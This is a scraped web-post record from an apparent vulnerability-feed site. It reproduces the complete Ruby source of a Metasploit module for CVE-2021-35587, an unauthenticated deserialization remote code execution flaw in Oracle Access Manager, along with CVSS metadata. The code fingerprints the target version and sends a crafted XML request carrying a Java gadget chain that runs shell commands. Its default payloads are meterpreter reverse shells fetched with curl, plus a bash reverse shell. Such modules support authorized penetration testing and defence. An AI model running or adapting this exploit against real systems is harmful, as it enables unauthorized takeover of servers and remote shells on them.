{“lastseen”:”2025-08-29T19:21:33″,”description”:”This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO Agent component of…”,”published”:”2025-08-29T18:53:41″,”modified”:”2025-04-08T18:54:15″,”type”:”metasploit”,”title”:”Oracle Access Manager unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-ORACLE_ACCESS_MANAGER_RCE_CVE_2021_35587-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-2883″,”CVE-2021-35587″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Oracle Access Manager unauthenticated Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO\\n Agent component of the Oracle Access Manager (OAM) product. The affected product versions are 11.1.2.3.0,\\n 12.2.1.3.0, and 12.2.1.4.0.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Jang’, # Original finder and technical analysis of CVE-2021-35587 (https:\/\/x.com\/testanull)\\n ‘Peterjson’, # Original finder of CVE-2021-35587\\n ‘Y4er’, # This exploit uses a modified gadget chain from an exploit by Y4er (https:\/\/x.com\/Y4er_ChaBug)\\n ‘sfewer-r7’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2021-35587’],\\n # Original Analysis of the vulnerability by the original finders, Jang \\u0026 Peterjson.\\n [‘URL’, ‘https:\/\/testbnull.medium.com\/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316’],\\n # Jang describes how to get a gadget chain working.\\n [‘URL’, ‘https:\/\/twitter.com\/testanull\/status\/1502114473989279744’],\\n # This exploit uses a modified gadget chain from CVE-2020-2883, by Y4er.\\n [‘URL’, ‘https:\/\/github.com\/Y4er\/CVE-2020-2883\/blob\/master\/CVE_2020_2883.java’],\\n # CVE-2021-35587 was patched by Oracle in Jan 2022.\\n [‘URL’, ‘https:\/\/www.oracle.com\/security-alerts\/cpujan2022.html’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2022-01-19’,\\n ‘Platform’ =\\u003e [ ‘linux’, ‘unix’, ‘win’ ],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Privileged’ =\\u003e false, # On Linux, executes as the user ‘oracle’.\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux Command’, {\\n ‘Platform’ =\\u003e [ ‘linux’, ‘unix’ ],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/https\/x64\/meterpreter_reverse_tcp’,\\n # A writable directory on the target for fetch based payloads to write to.\\n ‘FETCH_WRITABLE_DIR’ =\\u003e ‘\/tmp’\\n }\\n }\\n ],\\n [\\n ‘Windows Command’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/windows\/https\/x64\/meterpreter_reverse_tcp’,\\n # A writable directory on the target for fetch based payloads to write to.\\n ‘FETCH_WRITABLE_DIR’ =\\u003e ‘%TEMP%’\\n }\\n }\\n ],\\n # OAM can run on HP-UX, IBM AIX, and Solaris, so we have a separate Unix target for these.\\n [\\n ‘Unix Command’, {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ],\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 14100,\\n ‘SSL’ =\\u003e false,\\n ‘FETCH_COMMAND’ =\\u003e ‘CURL’,\\n # Delete the fetch binary after execution.\\n ‘FETCH_DELETE’ =\\u003e true\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n # By default, Oracle Access Manager is deployed on WebLogic under the path \/oam\/\\n OptString.new(‘TARGETURI’, [ true, ‘The base path to the OAM application’, ‘\/oam\/’])\\n ]\\n )\\n end\\n\\n def check\\n detected_version = get_version\\n\\n if detected_version\\n detected_description = \\”Oracle Access Manager #{detected_version}.\\”\\n\\n # According to Oracle, these 3 versions are affected.\\n affected_versions = [\\n ‘11.1.2.3.0’,\\n ‘12.2.1.3.0’,\\n ‘12.2.1.4.0’\\n ]\\n\\n affected_versions.each do |affected_version|\\n return CheckCode::Appears(detected_description) if detected_version == Rex::Version.new(affected_version)\\n end\\n\\n return CheckCode::Safe(detected_description)\\n end\\n\\n # By here we think the target is OAM, but we did not get a version number from the response body, so\\n # we cannot do a version based check to determine if vulnerable or safe.\\n CheckCode::Detected\\n rescue Msf::Exploit::Failed =\\u003e e\\n return Exploit::CheckCode::Unknown(e.message)\\n end\\n\\n def exploit\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘server’, ‘opensso’, ‘sessionservice’),\\n ‘ctype’ =\\u003e ‘text\/xml’,\\n ‘data’ =\\u003e get_xml\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Received unexpected HTTP status code: #{res.code}.\\”) unless res.code == 200\\n end\\n\\n def get_xml\\n gadget_b64 = Base64.strict_encode64(get_gadget)\\n\\n requester_b64 = Base64.strict_encode64(\\”object:#{gadget_b64}\\”)\\n\\n attr_authidentifier = {\\n ‘reqid’ =\\u003e Rex::Text.rand_text_alphanumeric(8..32),\\n ‘requester’ =\\u003e requester_b64\\n }.to_a.shuffle.to_h\\n\\n builder_authidentifier = Nokogiri::XML::Builder.new do |xml|\\n xml.authIdentifier(attr_authidentifier) do |xml_authidentifier|\\n xml_authidentifier.SessionID Rex::Text.rand_text_alphanumeric(8..32)\\n end\\n end\\n\\n attr_requestset = {\\n ‘svcid’ =\\u003e ‘session’,\\n ‘reqid’ =\\u003e Rex::Text.rand_text_alphanumeric(8..32),\\n ‘vers’ =\\u003e Rex::Text.rand_text_alphanumeric(8..32)\\n }.to_a.shuffle.to_h\\n\\n attr_request = {\\n ‘dtdid’ =\\u003e Rex::Text.rand_text_alphanumeric(8..32),\\n ‘sid’ =\\u003e Rex::Text.rand_text_alphanumeric(8..32)\\n }.to_a.shuffle.to_h\\n\\n builder_root = Nokogiri::XML::Builder.new(encoding: ‘UTF-8’) do |xml|\\n xml.RequestSet(attr_requestset) do |xml_requestset|\\n xml_requestset.Request(attr_request) do |xml_request|\\n xml_request.cdata(builder_authidentifier.to_xml)\\n end\\n end\\n end\\n\\n xml_data = builder_root.to_xml\\n\\n vprint_status(‘Using XML:’)\\n vprint_line(xml_data)\\n\\n xml_data\\n end\\n\\n def get_gadget\\n detected_version = get_version\\n\\n gadget_file = nil\\n\\n case detected_version\\n when Rex::Version.new(‘12.2.1.4.0’)\\n gadget_file = ‘gadget_12.2.1.4.0.bin’\\n when Rex::Version.new(‘12.2.1.3.0’)\\n gadget_file = ‘gadget_12.2.1.3.0.bin’\\n else\\n fail_with(Failure::NoTarget, \\”No suitable gadget chain for this version: #{detected_version}.\\”)\\n end\\n\\n # See .\/data\/exploits\/CVE-2021-35587\/gadget.java for how we generate the gadget bin files.\\n gadget_data = ::File.binread(::File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-35587’, gadget_file))\\n\\n shell_name = nil\\n shell_arg = nil\\n\\n if (target.platform.platforms \\u0026 [Msf::Module::Platform::Linux, Msf::Module::Platform::Unix]).any?\\n shell_name = ‘\/bin\/sh’\\n shell_arg = ‘-c’\\n elsif target.platform.platforms.include? Msf::Module::Platform::Windows\\n shell_name = ‘cmd.exe’\\n shell_arg = ‘\/C’\\n else\\n fail_with(Failure::BadConfig, \\”No gadget shell support for target #{target[‘Platform’]}.\\”)\\n end\\n\\n {\\n ‘EXEC_ARG0’ =\\u003e shell_name,\\n ‘EXEC_ARG1’ =\\u003e shell_arg,\\n ‘EXEC_ARG2’ =\\u003e payload.encoded\\n }.each do |key, value|\\n gadget_data.gsub!(\\n [key.length].pack(‘n’) + key,\\n [value.length].pack(‘n’) + value\\n )\\n end\\n\\n vprint_status(\\”Using gadget (#{gadget_file}):\\”)\\n vprint_line(Rex::Text.to_hex_dump(gadget_data))\\n\\n gadget_data\\n end\\n\\n def get_version\\n # This unauthenticated endpoint will conveniently report the OAM product version number.\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘pages’, ‘impconsent.jsp’)\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Received unexpected HTTP status code: #{res.code}.\\”) unless res.code == 200\\n\\n # We expect a response to have one or both of these HTTP headers.\\n unless res.headers.key?(‘X-ORACLE-DMS-RID’) || res.headers.key?(‘X-ORACLE-DMS-ECID’)\\n fail_with(Failure::UnexpectedReply, ‘No X-ORACLE-DMS-RID or X-ORACLE-DMS-ECID HTTP header seen’)\\n end\\n\\n unless res.body =~ \/Oracle Access Management Version: (\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/\\n fail_with(Failure::UnexpectedReply, ‘Unable to determine target version’)\\n end\\n\\n Rex::Version.new(Regexp.last_match(1))\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/oracle_access_manager_rce_cve_2021_35587.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”baseScore”:9.8,”baseSeverity”:”CRITICAL”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/oracle_access_manager_rce_cve_2021_35587\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:21:33″,”description”:”This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO Agent component of…”,”published”:”2025-08-29T18:53:41″,”modified”:”2025-04-08T18:54:15″,”type”:”metasploit”,”title”:”Oracle Access Manager unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-ORACLE_ACCESS_MANAGER_RCE_CVE_2021_35587-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-2883″,”CVE-2021-35587″],”sourceData”:”##\\n# This module requires…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-15129","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n